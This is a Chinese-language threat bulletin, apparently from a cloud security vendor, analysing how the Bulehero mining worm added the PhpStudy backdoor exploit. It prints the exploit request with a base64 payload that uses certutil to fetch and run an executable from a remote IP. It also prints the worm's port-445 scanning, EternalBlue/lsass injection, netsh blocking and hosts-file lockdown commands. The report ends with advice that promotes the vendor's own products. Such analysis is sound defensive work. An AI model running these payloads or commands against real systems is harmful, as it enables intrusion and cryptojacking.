威脅快報|Bulehero挖礦蠕蟲升級，PhpStudy后門漏洞加入武器庫

概述

背景介紹

Bulehero

PhpStudy后門漏洞

蠕蟲分析

攻擊行為分析

GET /index.php HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Charset: c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn
Referer: http://xxx:80/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xxx

system('certutil.exe -urlcache -split -f http://60.164.250.170:3888/download.exe %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe & %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe');echo md5('phpstudy');

被感染主機行為

• 挖礦模塊：該模塊進行門羅幣的挖礦，Bulehero在該版本中并未使用公共礦池進行挖礦，改用自建的礦池代理進行挖礦任務分發，因此可以避免暴露錢包地址，防止安全研究人員的跟蹤。
• 掃描模塊：該模塊會掃描互聯網的特定開放端口，并將掃描結果寫入到名為Result.txt的文件中

C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe -iL C:\Windows\gstmlepnk\ntkpmzgif\ip.txt -oJ C:\Windows\gstmlepnk\ntkpmzgif\Result.txt --open --rate 4096 -p 445

• 攻擊模塊： 該模塊集成多種漏洞利用工具，讀取掃描結果并攻擊其他主機，如下進程是其使用永恒之藍漏洞模塊進行攻擊。

C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe --InConfig C:\Windows\gstmlepnk\UnattendGC\specials\svschost.xml --TargetIp 106.14.149.128 --TargetPort 445 --DllPayload C:\Windows\gstmlepnk\UnattendGC\AppCapture64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll

• 其他行為 使用netsh ipsec安全工具，阻斷存在漏洞的服務端口，防止其他競爭者進入。

netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filteraction name=BastardsList action=block

cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

時間線

其他攻擊方式

IOCs

安全建議

1. 企業需要對涉及的漏洞及時修復，否則容易成為挖礦木馬的受害者。
2. 建議使用阿里云安全的下一代云防火墻產品，其阻斷惡意外聯、能夠配置智能策略的功能，能夠有效幫助防御入侵。哪怕攻擊者在主機上的隱藏手段再高明，下載、挖礦、反彈shell這些操作，都需要進行惡意外聯；云防火墻的攔截將徹底阻斷攻擊鏈。此外，用戶還可以通過自定義策略，直接屏蔽惡意網站，達到阻斷入侵的目的。此外，云防火墻獨有的虛擬補丁功能，能夠幫助客戶更靈活、更“無感”地阻斷攻擊。
3. 對于有更高定制化要求的用戶，可以考慮使用阿里云安全管家服務。購買服務后將有經驗豐富的安全專家提供咨詢服務，定制適合您的方案，幫助加固系統，預防入侵。入侵事件發生后，也可介入直接協助入侵后的清理、事件溯源等，適合有較高安全需求的用戶，或未雇傭安全工程師，但希望保障系統安全的企業。